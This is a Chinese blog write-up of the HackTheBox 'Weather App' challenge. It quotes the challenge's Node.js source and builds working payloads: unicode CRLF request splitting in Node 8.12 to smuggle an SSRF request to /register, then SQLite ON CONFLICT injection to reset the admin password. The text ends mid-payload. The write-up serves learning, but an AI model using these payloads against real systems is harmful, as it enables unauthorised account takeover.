<!DOCTYPE html>


  <html class="light page-post">


<head>
  <meta charset="utf-8">
  
  <title>nodejs请求走私与ssrf | blog</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="SSRF," />
  

  <meta name="description" content="最近看到hackthebox一道题，关于nodejs请求走私的，学到不少东西，这里记录一下。 1. 先说题目题目直接给了源码，题目名字是weather app，大家有兴趣可以直接去hackthebox做这道题。 源码是nodejs的，docker环境，代码功能看起来很简单，一共三个功能。分别是：登录(login)，注册(register)和查询天气的api接口(&#x2F;api&#x2F;weather)。 在注册">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs请求走私与ssrf">
<meta property="og:url" content="http://blog.le31ei.top/2021/05/23/nodejs%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E4%B8%8Essrf/index.html">
<meta property="og:site_name" content="blog">
<meta property="og:description" content="最近看到hackthebox一道题，关于nodejs请求走私的，学到不少东西，这里记录一下。 1. 先说题目题目直接给了源码，题目名字是weather app，大家有兴趣可以直接去hackthebox做这道题。 源码是nodejs的，docker环境，代码功能看起来很简单，一共三个功能。分别是：登录(login)，注册(register)和查询天气的api接口(&#x2F;api&#x2F;weather)。 在注册">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://blog.le31ei.top/2021/05/23/nodejs%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E4%B8%8Essrf/image-20210523175455654.png">
<meta property="article:published_time" content="2021-05-23T11:12:40.000Z">
<meta property="article:modified_time" content="2021-05-23T11:12:40.245Z">
<meta property="article:author" content="le31ei">
<meta property="article:tag" content="SSRF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://blog.le31ei.top/2021/05/23/nodejs%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E4%B8%8Essrf/image-20210523175455654.png">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbeddx" rel="stylesheet">


  

  
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'G-4RKHRGTSTZ', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->


  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?ccc85f1c0e860658bc30a742eab6c9d0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  
    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <meta name="referrer" content="no-referrer-when-downgrade">
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
  

<meta name="generator" content="Hexo 5.0.2"><link rel="alternate" href="/atom.xml" title="blog" type="application/atom+xml">
</head>

<body>


  
    <span id="toolbox-mobile" class="toolbox-mobile">HOME</span>
  

  <div class="post-header CENTER">
   
  <div class="toolbox">
    <a class="toolbox-entry" href="/">
      <span class="toolbox-entry-text">HOME</span>
      <i class="icon-angle-down"></i>
      <i class="icon-home"></i>
    </a>
    <ul class="list-toolbox">
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/archives/"
            rel="noopener noreferrer"
            target="_self"
            >
            博客
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/category/"
            rel="noopener noreferrer"
            target="_self"
            >
            分类
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/tag/"
            rel="noopener noreferrer"
            target="_self"
            >
            标签
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/about/"
            rel="noopener noreferrer"
            target="_self"
            >
            关于
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/atom.xml"
            rel="noopener noreferrer"
            target="_blank"
            >
            RSS
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/search/"
            rel="noopener noreferrer"
            target="_self"
            >
            search
          </a>
        </li>
      
    </ul>
  </div>


</div>


  <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E5%85%88%E8%AF%B4%E9%A2%98%E7%9B%AE"><span class="toc-text">1. 先说题目</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-nodejs%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81"><span class="toc-text">2. nodejs请求走私</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-sqlite%E6%B3%A8%E5%85%A5"><span class="toc-text">3. sqlite注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E6%A1%A3"><span class="toc-text">参考文档</span></a></li></ol>
  </div>



<div class="content content-post CENTER">
   <article id="post-nodejs请求走私与ssrf" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">nodejs请求走私与ssrf</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2021.05.23</span>
      </span>

      
        <span class="article-author">
          <i class="icon-user"></i>
          <span>le31ei</span>
        </span>
      

      
  <span class="article-category">
    <i class="icon-list"></i>
    <a class="article-category-link" href="/categories/Pentest/">Pentest</a>
  </span>



      

      
      <i class="fa fa-eye"></i> 
        <span id="busuanzi_container_page_pv">
           &nbsp热度 <span id="busuanzi_value_page_pv">
           <i class="fa fa-spinner fa-spin"></i></span>℃
        </span>
      
      
    </div>
  </header>

  <div class="article-content">
    
      <p>最近看到hackthebox一道题，关于nodejs请求走私的，学到不少东西，这里记录一下。</p>
<h1 id="1-先说题目"><a href="#1-先说题目" class="headerlink" title="1. 先说题目"></a>1. 先说题目</h1><p>题目直接给了源码，题目名字是<code>weather app</code>，大家有兴趣可以直接去hackthebox做这道题。</p>
<p>源码是nodejs的，docker环境，代码功能看起来很简单，一共三个功能。分别是：登录(login)，注册(register)和查询天气的api接口(/api/weather)。</p>
<p>在注册的代码中检查了来源ip是不是<code>127.0.0.1</code>，使用的是<code>req.socket.remoteAddress</code>，这种情况是没办法绕过的。所以需要通过查询天气的api接口来进行ssrf攻击。</p>
<p>以下贴一下关键部分的代码</p>
<p><code>WeatherHelper.js</code>这是查询天气接口的api，endpoint、city和country三个参数可控，可以通过该处进行ssrf攻击</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> <span class="function"><span class="title">getWeather</span>(<span class="params">res, endpoint, city, country</span>)</span> &#123;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// *.openweathermap.org is out of scope</span></span><br><span class="line">        <span class="keyword">let</span> apiKey = <span class="string">&#x27;10a62430af617a949055a46fa6dec32f&#x27;</span>;</span><br><span class="line">        <span class="keyword">let</span> weatherData = <span class="keyword">await</span> HttpHelper.HttpGet(<span class="string">`http://<span class="subst">$&#123;endpoint&#125;</span>/data/2.5/weather?q=<span class="subst">$&#123;city&#125;</span>,<span class="subst">$&#123;country&#125;</span>&amp;units=metric&amp;appid=<span class="subst">$&#123;apiKey&#125;</span>`</span>); </span><br><span class="line">        </span><br></pre></td></tr></table></figure>

<p><code>router/index.js</code>：这是路由的代码，有三个关键接口<code>/login</code>、<code>/register</code>、<code>/api/weather</code>，关键代码如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">router.post(<span class="string">&#x27;/register&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (req.socket.remoteAddress.replace(<span class="regexp">/^.*:/</span>, <span class="string">&#x27;&#x27;</span>) != <span class="string">&#x27;127.0.0.1&#x27;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.status(<span class="number">401</span>).end();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> &#123; username, password &#125; = req.body;</span><br><span class="line">        <span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line">        <span class="keyword">return</span> db.register(username, password)</span><br><span class="line">            .then(<span class="function">()  =&gt;</span> res.send(response(<span class="string">&#x27;Successfully registered&#x27;</span>)))</span><br><span class="line">            .catch(<span class="function">() =&gt;</span> res.send(response(<span class="string">&#x27;Something went wrong&#x27;</span>)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> res.send(response(<span class="string">&#x27;Missing parameters&#x27;</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">&#x27;/login&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> &#123; username, password &#125; = req.body;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line">        <span class="keyword">return</span> db.isAdmin(username, password)</span><br><span class="line">            .then(<span class="function"><span class="params">admin</span> =&gt;</span> &#123;</span><br><span class="line">                <span class="keyword">if</span> (admin) <span class="keyword">return</span> res.send(fs.readFileSync(<span class="string">&#x27;/app/flag&#x27;</span>).toString());</span><br><span class="line">                <span class="keyword">return</span> res.send(response(<span class="string">&#x27;You are not admin&#x27;</span>));</span><br><span class="line">            &#125;)</span><br><span class="line">            .catch(<span class="function">() =&gt;</span> res.send(response(<span class="string">&#x27;Something went wrong&#x27;</span>)));</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> re.send(response(<span class="string">&#x27;Missing parameters&#x27;</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">&#x27;/api/weather&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> &#123; endpoint, city, country &#125; = req.body;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (endpoint &amp;&amp; city &amp;&amp; country) &#123;</span><br><span class="line">        <span class="keyword">return</span> WeatherHelper.getWeather(res, endpoint, city, country);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> res.send(response(<span class="string">&#x27;Missing parameters&#x27;</span>));</span><br><span class="line">&#125;);    </span><br></pre></td></tr></table></figure>

<p><code>views/database.js</code>：这是创建数据库和两个判断函数的文件。创建的user表中的admin密码字段为随机字段。关键代码如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> <span class="function"><span class="title">migrate</span>(<span class="params"></span>)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.db.exec(<span class="string">`</span></span><br><span class="line"><span class="string">            DROP TABLE IF EXISTS users;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            CREATE TABLE IF NOT EXISTS users (</span></span><br><span class="line"><span class="string">                id         INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span></span><br><span class="line"><span class="string">                username   VARCHAR(255) NOT NULL UNIQUE,</span></span><br><span class="line"><span class="string">                password   VARCHAR(255) NOT NULL</span></span><br><span class="line"><span class="string">            );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            INSERT INTO users (username, password) VALUES (&#x27;admin&#x27;, &#x27;<span class="subst">$&#123; crypto.randomBytes(<span class="number">32</span>).toString(<span class="string">&#x27;hex&#x27;</span>) &#125;</span>&#x27;);</span></span><br><span class="line"><span class="string">        `</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">async</span> <span class="function"><span class="title">register</span>(<span class="params">user, pass</span>)</span> &#123;</span><br><span class="line">        <span class="comment">// <span class="doctag">TODO:</span> add parameterization and roll public</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="keyword">let</span> query = <span class="string">`INSERT INTO users (username, password) VALUES (&#x27;<span class="subst">$&#123;user&#125;</span>&#x27;, &#x27;<span class="subst">$&#123;pass&#125;</span>&#x27;)`</span>;</span><br><span class="line">                resolve((<span class="keyword">await</span> <span class="built_in">this</span>.db.run(query)));</span><br><span class="line">            &#125; <span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span> &#123;</span><br><span class="line">                reject(e);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">async</span> <span class="function"><span class="title">isAdmin</span>(<span class="params">user, pass</span>)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="keyword">let</span> smt = <span class="keyword">await</span> <span class="built_in">this</span>.db.prepare(<span class="string">&#x27;SELECT username FROM users WHERE username = ? and password = ?&#x27;</span>);</span><br><span class="line">                <span class="keyword">let</span> row = <span class="keyword">await</span> smt.get(user, pass);</span><br><span class="line">                resolve(row !== <span class="literal">undefined</span> ? row.username == <span class="string">&#x27;admin&#x27;</span> : <span class="literal">false</span>);</span><br><span class="line">            &#125; <span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span> &#123;</span><br><span class="line">                reject(e);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



<p>根据以上代码不难看出这道题的解题思路：</p>
<ol>
<li>根据weather api的查询接口，发起ssrf攻击</li>
<li>ssrf对register接口进行攻击，注册一个用户</li>
<li>注册的时候利用views/database.js中的register函数的注入漏洞</li>
<li>登录admin账户即可拿到flag</li>
</ol>
<p>思路有了，那么几个关键点就出来了，如何发起ssrf攻击？如何利用注入漏洞？</p>
<h1 id="2-nodejs请求走私"><a href="#2-nodejs请求走私" class="headerlink" title="2. nodejs请求走私"></a>2. nodejs请求走私</h1><p>题目给了dockerfile文件，其中的关键点就在<code>FROM node:8.12.0-alpine</code>，nodejs指定版本8.12。这个版本已经很老了，目前我使用的版本都v15.x了，所以特定指定该版本，肯定是要利用nodejs的相关漏洞。</p>
<p>通过搜索不难发现nodejs 8.12存在拆分攻击漏洞（请求走私）。在http get请求的时候，没有处理好unicode字符，导致可以构造回车换行符来修改http流量，可以在正常请求中夹带另一个请求。具体的漏洞原理可以查看<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2894">《通过拆分攻击实现的SSRF攻击》</a>。</p>
<p>而在该题目中，需要通过weather查询的api，来构造一个post到register的请求。</p>
<p>那么我们第一步就是要构造一个正常的注册包，题目给了源码，可以直接在本地用docker起起来。在调试的时候，为了方便可以暂时把判断<code>127.0.0.1</code>的代码给注释掉。</p>
<p>构造正常的注册包如下，注意<code>Content-Type</code>和<code>Content-Length</code>是两个必要的字段，参数上面仅有一行空余：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/register</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:1337</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 38</span><br><span class="line"></span><br><span class="line">username=admixxxn2&amp;password=admin2</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>构造如上数据包后，可以正常进行注册。该处有个小的tips，就是<code>Content-Type</code>如果使用<code>application/json</code>的话，会存在编码问题。nodejs的httpget函数在发起请求时，会对特殊字符采用URL编码，如果要请求走私的话，提交的json字符的<code>&#123;</code>、<code>&#125;</code>、<code>&quot;</code>都会被直接URL编码，如果夹在正常的http包中，服务端不会正常解码，会全部判断为body字符，导致json解码失败。</p>
<p><img src="/2021/05/23/nodejs%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E4%B8%8Essrf/image-20210523175455654.png" alt="image-20210523175455654"></p>
<p>第二步就是要通过请求走私的漏洞，构造一个原始的POST包，混合在正常的数据包中。根据漏洞原理，对于回车换行符可以采用<code>\u010D\u010A</code>，空格可以采用<code>\u0120</code>进行替换。</p>
<p>所以构造出来的数据包如下：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:1337\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u012086\u010D\u010A\u010D\u010Ausername=admin&amp;password=admin2\u010D\u010A\u010D\u010AGET\u0120/123</span><br></pre></td></tr></table></figure>

<p>在nodejs中编写如下代码，然后nc监听即可通过nc查看构造的包</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> http = <span class="built_in">require</span>(<span class="string">&quot;http&quot;</span>);</span><br><span class="line">http.get(<span class="string">&quot;http://127.0.0.1:8888/query?param=1\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:8888\u010D\u010A\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:1337\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u012086\u010D\u010A\u010D\u010Ausername=admin2&amp;password=admin2\u010D\u010A\u010D\u010AGET\u0120/123&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>nc可得到构造好的数据包</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">/app # nc -lvvp 8888</span><br><span class="line">listening on [::]:8888 ...</span><br><span class="line">connect to [::ffff:127.0.0.1]:8888 from localhost:47630 ([::ffff:127.0.0.1]:47630)</span><br><span class="line"><span class="keyword">GET</span> <span class="string">/query?param=1</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:80</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">POST</span> <span class="string">/register</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:1337</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 35</span><br><span class="line"></span><br><span class="line">username=admin2&amp;password=admin2</span><br><span class="line"></span><br><span class="line"><span class="keyword">GET</span> <span class="string">/123/data/2.5/weather?q=2,3&amp;units=metric&amp;appid=10a62430af617a949055a46fa6dec32f</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:8888</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br></pre></td></tr></table></figure>

<p>最后一步很简单，就是将数据包放入到weather查询的api当中</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/api/weather</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1:1337</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9,ko;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span>: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9</span><br><span class="line"><span class="attribute">If-None-Match</span>: W/&quot;40a-17749845bb8&quot;</span><br><span class="line"><span class="attribute">If-Modified-Since</span>: Thu, 28 Jan 2021 15:02:27 GMT</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json</span><br><span class="line"><span class="attribute">Content-Length</span>: 474</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;&quot;endpoint&quot;:&quot;127.0.0.1/query?param=1\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:80\u010D\u010A\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1:80\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u012090\u010D\u010A\u010D\u010Ausername=admin2&amp;password=admin2\u010D\u010A\u010D\u010AGET\u0120/123&quot;,&quot;city&quot;:&quot;2&quot;,&quot;country&quot;: &quot;3&quot;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="3-sqlite注入"><a href="#3-sqlite注入" class="headerlink" title="3. sqlite注入"></a>3. sqlite注入</h1><p>上面的ssrf问题解决了，最后一个问题来了，sqlite的注入怎么利用？</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> <span class="function"><span class="title">register</span>(<span class="params">user, pass</span>)</span> &#123;</span><br><span class="line">    <span class="comment">// <span class="doctag">TODO:</span> add parameterization and roll public</span></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> query = <span class="string">`INSERT INTO users (username, password) VALUES (&#x27;<span class="subst">$&#123;user&#125;</span>&#x27;, &#x27;<span class="subst">$&#123;pass&#125;</span>&#x27;)`</span>;</span><br><span class="line">            resolve((<span class="keyword">await</span> <span class="built_in">this</span>.db.run(query)));</span><br><span class="line">        &#125; <span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span> &#123;</span><br><span class="line">            reject(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们可以看到，注入点在insert里面，一般针对mysql的话，注入点在insert后，一般采用的是报错注入，但这道题是sqlite的后端数据库。</p>
<p>经过一番搜索，针对这道题可以采用<code>ON CONFLICT DO UPDATE</code>的语法，在插入时候如果有冲突的话，则将admin的密码改成我们已知的密码。</p>
<p>以上的注入点可以构造如下语法:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">INSERT</span> <span class="keyword">INTO</span> <span class="keyword">users</span> (username, <span class="keyword">password</span>) <span class="keyword">VALUES</span> (<span class="string">&#x27;admin&#x27;</span>, <span class="string">&#x27;admin&#x27;</span>) <span class="keyword">ON</span> CONFLICT(username) <span class="keyword">DO</span> <span class="keyword">UPDATE</span> <span class="keyword">set</span> <span class="keyword">password</span>=<span class="string">&#x27;123&#x27;</span></span><br></pre></td></tr></table></figure>

<p>这样在注册的时候，username字段有冲突，就直接把该条记录更改为自己可控的字段。</p>
<p>所以根据以上的内容，可以得到以下的payload</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/api/weather</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 178.62.14.223:30863</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9,ko;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span>: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9</span><br><span class="line"><span class="attribute">If-None-Match</span>: W/&quot;40a-17749845bb8&quot;</span><br><span class="line"><span class="attribute">If-Modified-Since</span>: Thu, 28 Jan 2021 15:02:27 GMT</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json</span><br><span class="line"><span class="attribute">Content-Length</span>: 474</span><br><span class="line"></span><br><span class="line"></span><br><span 